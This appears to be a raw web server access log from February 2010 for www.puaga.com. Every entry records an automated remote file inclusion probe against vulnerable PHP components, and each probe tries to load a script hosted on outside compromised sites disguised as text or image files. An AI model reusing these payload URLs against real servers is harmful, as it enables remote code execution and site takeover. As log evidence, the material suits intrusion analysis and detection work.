209.62.88.170 - - [14/Feb/2010:08:10:43 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:10:43 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:10:43 -0800] "GET /logs/access_100107.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:10:47 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:10:47 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:10:47 -0800] "GET /logs/access_100107.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:10:55 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:08:10:59 -0800] "GET /logs/access_100129.log/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:11:20 -0800] "GET /logs/access_100115.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:11:24 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:11:24 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:11:24 -0800] "GET /index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:11:26 -0800] "GET /logs/access_100115.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:11:29 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:11:30 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:11:31 -0800] "GET /index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:11:33 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:11:36 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:11:36 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:11:36 -0800] "GET /index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:11:37 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:11:44 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:11:44 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:11:45 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:11:45 -0800] "GET /index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:11:56 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:12:07 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:12:08 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:12:08 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:12:17 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:12:17 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:12:17 -0800] "GET /logs/access_100107.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [14/Feb/2010:08:12:44 -0800] "GET /snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [14/Feb/2010:08:12:44 -0800] "GET /logs/access_100116.log%20%20//snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [14/Feb/2010:08:12:45 -0800] "GET /logs//snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:12:48 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:12:48 -0800] "GET /logs/access_100107.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:12:48 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:08:13:17 -0800] "GET /logs/access_100126.log%20%20//include/write.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:13:57 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:13:57 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:13:57 -0800] "GET /logs/access_100107.log%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:14:00 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:14:00 -0800] "GET /logs/access_100107.log%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:14:03 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:14:04 -0800] "GET /mcf.php?content=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:14:04 -0800] "GET /logs/mcf.php?content=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:14:04 -0800] "GET /logs/access_100107.log%20%20/mcf.php?content=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:14:16 -0800] "GET /logs/access_100116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:15:20 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:15:20 -0800] "GET /logs/access_100107.log%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:15:20 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [14/Feb/2010:08:15:53 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [14/Feb/2010:08:15:53 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [14/Feb/2010:08:15:56 -0800] "GET /index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:16:09 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:16:09 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:16:09 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:16:18 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:16:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:16:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:08:16:42 -0800] "GET /logs/access_100202.log/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:16:59 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:16:59 -0800] "GET /logs/access_100107.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:16:59 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:17:13 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:17:13 -0800] "GET /logs/access_100111.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:17:13 -0800] "GET /errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:17:13 -0800] "GET /logs/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:17:17 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:17:17 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:17:17 -0800] "GET /logs/access_100107.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:17:30 -0800] "GET /logs/access_100116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:17:35 -0800] "GET /logs/access_100116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [14/Feb/2010:08:17:36 -0800] "GET /logs/access_100130.log//snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [14/Feb/2010:08:17:44 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:17:47 -0800] "GET /logs/access_100107.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:18:05 -0800] "GET /logs/access_100110.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:18:06 -0800] "GET /logs/access_100107.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [14/Feb/2010:08:18:17 -0800] "GET /logs/access_100202.log//snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:18:26 -0800] "GET /logs/access_100110.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:08:18:32 -0800] "GET /main.php?page=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:08:18:32 -0800] "GET /logs/main.php?page=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:18:32 -0800] "GET /logs/access_100107.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:08:18:32 -0800] "GET /logs/access_100114.log/main.php?page=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.144.12.142 - - [14/Feb/2010:08:18:51 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.144.12.142 - - [14/Feb/2010:08:18:52 -0800] "GET /index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.144.12.142 - - [14/Feb/2010:08:18:53 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:18:55 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:18:55 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:08:18:55 -0800] "GET /logs/access_100110.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:18:55 -0800] "GET /logs/access_100107.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:18:55 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:18:55 -0800] "GET /logs/access_100107.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:08:18:55 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.144.12.142 - - [14/Feb/2010:08:19:02 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:19:29 -0800] "GET /logs/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:19:29 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:19:29 -0800] "GET /logs/access_100109.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:19:29 -0800] "GET /index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:19:37 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:19:37 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:19:37 -0800] "GET /logs/access_100107.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:08:19:44 -0800] "GET /logs/main.php?page=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:08:19:44 -0800] "GET /main.php?page=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:08:19:44 -0800] "GET /logs/access_100114.log/main.php?page=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:08:20:06 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:08:20:06 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:08:20:06 -0800] "GET /logs/access_100116.log%20%20/classes/adodbt/sql.php?classes_dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:09 -0800] "GET /logs/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:09 -0800] "GET /index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:09 -0800] "GET /logs/access_100109.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:11 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [14/Feb/2010:08:20:24 -0800] "GET /bbs/skin/buzzard_espoon/setup.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
